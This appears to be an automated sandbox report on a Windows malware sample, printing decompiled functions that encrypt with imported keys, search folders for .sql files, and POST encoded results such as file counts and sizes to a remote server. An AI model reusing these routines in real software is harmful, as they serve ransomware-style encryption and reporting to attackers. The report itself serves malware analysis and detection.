			E0FE66550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0FE663E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0fe66553
0x0fe66554
0x0fe66565
0x0fe6656e
0x0fe6657f
0x0fe66588
0x0fe6658d
0x0fe66597
0x0fe665b5
0x0fe665b9
0x0fe665c3
0x0fe665c8
0x0fe665c8
0x0fe665d2
0x0fe665df

APIs

VirtualAlloc.KERNELBASE(00000000,00000123,00003000,00000004,?,?,0FE64B9E), ref: 0FE66565
VirtualAlloc.KERNELBASE(00000000,00000515,00003000,00000004,?,0FE64B9E), ref: 0FE6657F

Part of subcall function 0FE663E0: CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FE64B96,?,0FE64B9E), ref: 0FE663F8
Part of subcall function 0FE663E0: GetLastError.KERNEL32(?,0FE64B9E), ref: 0FE66402
Part of subcall function 0FE663E0: CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE64B9E), ref: 0FE6641E

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: d6cfdad9543b77fe09fadbd5492688c728569e093da4d436d9493b2d08e1eebd
Instruction ID: 60033e36e286cbea2d4e7d9f02bb43def1d578716869ab6b5119507b1b0b91ae
Opcode Fuzzy Hash: d6cfdad9543b77fe09fadbd5492688c728569e093da4d436d9493b2d08e1eebd
Instruction Fuzzy Hash: D511DBB4A40208EFD704CF84DA55F9AB7F5EF88705F208188E904AB381D7B5EF109B54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FE653D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0FE653D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0FE65F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0FE633E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0FE65350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0FE67E40( &_v104);
						_v92 = E0FE65220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xfe6fb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xfe6fb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xfe6fb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xfe6fb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xfe6fb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xfe6fb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0FE68050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0FE653D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xfe72a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xfe72a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE653DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE653F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FE6541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE65477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE65481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE65492
HeapFree.KERNEL32(00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE654AD
HeapFree.KERNEL32(00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE654BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE654CD
GetLastError.KERNEL32(?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE654DC
lstrlenA.KERNEL32(00000000,00000000,00000000,74716980), ref: 0FE65512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FE65532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FE65544
lstrcatA.KERNEL32(00000000,?), ref: 0FE6555E
lstrlenA.KERNEL32(00000000), ref: 0FE655B3
lstrlenW.KERNEL32(?), ref: 0FE655BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FE655DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE65643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE6564D
InternetCloseHandle.WININET(0FE6581B), ref: 0FE65657

Strings

popkadurak, xrefs: 0FE655E9
POST, xrefs: 0FE655CA

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: 7ac14ff635837346fb44cd8f08c0d60cf87b88dfeffb64b48621e823c446a904
Instruction ID: 535a7b344d7fe086358931880389d0ccd3dd37e984a31070855d7b1bccb2dcf9
Opcode Fuzzy Hash: 7ac14ff635837346fb44cd8f08c0d60cf87b88dfeffb64b48621e823c446a904
Instruction Fuzzy Hash: 0C71D371E4030DABDB109FA69C44FEFBB78EF89B96F141125EA05B3241DB789940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FE65670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0FE63BC0( &_v164);
				E0FE67490( &_v164, _t82);
				E0FE672A0( &_v164);
				E0FE670A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xfe72a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xfe72a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0FE65F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0FE654F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0FE67D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FE65696
wsprintfW.USER32 ref: 0FE656BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FE65708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FE6571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE65739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0FE6574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0FE65757
wsprintfA.USER32 ref: 0FE6576D
CryptBinaryToStringA.CRYPT32(00000000,747166A0,40000001,00000000,?), ref: 0FE6579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0FE657A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE657B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0FE657C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE657CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE657EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE65804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE6583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE65854

Strings

popkadurak, xrefs: 0FE65746, 0FE65762
action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FE656B9

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: f9f6c222957385a5d240d01f5b2d0b38e992868aff8e4ba994e8ad155fb68b14
Instruction ID: be8cc078789ba3c1dc944dfdbc5d26479183033deee5385b41accaf49e47b1a6
Opcode Fuzzy Hash: f9f6c222957385a5d240d01f5b2d0b38e992868aff8e4ba994e8ad155fb68b14
Instruction Fuzzy Hash: CA51D470B8030CBFEB209B65DC46FAF7B79EF45B85F540069F601B6181DAB8AA10CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE66BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FE68260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0FE66B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66BB2
lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66BD2
lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66BFC
lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66C12
lstrcatW.KERNEL32(00000000,?), ref: 0FE66C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0FE66C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FE66C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FE66C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FE66C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FE66C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FE66CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0FE66CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FE66CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0FE66CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0FE66D1C
FindClose.KERNEL32(?,?,?), ref: 0FE66D2D

Strings

*******************, xrefs: 0FE66CB9, 0FE66CC9
.sql, xrefs: 0FE66C54

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: a3c5026673e8541d3365ab14b521aba74d164e511f67638fb804e1216eb7f243
Instruction ID: d572069647e2d6ea93d65895b4dca508a2649bfc65958855fbdb71b43d1c90b8
Opcode Fuzzy Hash: a3c5026673e8541d3365ab14b521aba74d164e511f67638fb804e1216eb7f243
Instruction Fuzzy Hash: 6F41C271A9021DABDB20AF619C48FAF77BCEF06B95F405075F901F6141EB78AA10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0FE68400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0FE68400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE68420
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FE68448
GetModuleHandleA.KERNEL32(?), ref: 0FE6849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE684AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE684BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE684DE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE684EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE68500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE6850E

Strings

Advapi32.dll, xrefs: 0FE684A7, 0FE684AA
CryptGenRandomAdvapi32.dll, xrefs: 0FE684B5, 0FE684B8

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: ef1133a00187d5804e2f01ba836974ce69a52c91445677ef2e9e7c78ce3e4f12
Instruction ID: 8bb64b77177dc2d296b77a6adc8dc5a007c2b31bd89333f058ac0f0600bdb0cd
Opcode Fuzzy Hash: ef1133a00187d5804e2f01ba836974ce69a52c91445677ef2e9e7c78ce3e4f12
Instruction Fuzzy Hash: 7F31A171E4020DAFDB108FE6DC49BEEBBB9EF45B52F104069EA01F6180D7789A108B64

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FE66660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xfe72a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0FE636C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xfe72a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(0FE72A48,?,0FE638F4,00000000,00000000,00000000,?,00000800), ref: 0FE6666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FE638F4,00000000,00000000,00000000), ref: 0FE66691
GetLastError.KERNEL32(?,0FE638F4,00000000,00000000,00000000), ref: 0FE6669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE638F4,00000000,00000000,00000000), ref: 0FE666B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FE638F4,00000000,00000000), ref: 0FE666EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0FE638F4,0000000A,00000000,?,0FE638F4,00000000), ref: 0FE6670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FE638F4,?,0FE638F4,00000000), ref: 0FE66735
GetLastError.KERNEL32(?,0FE638F4,00000000), ref: 0FE6673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FE638F4,00000000,00000000), ref: 0FE6675B
LeaveCriticalSection.KERNEL32(0FE72A48,?,0FE638F4,00000000,00000000), ref: 0FE66766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FE66686, 0FE666AC

Memory Dump Source

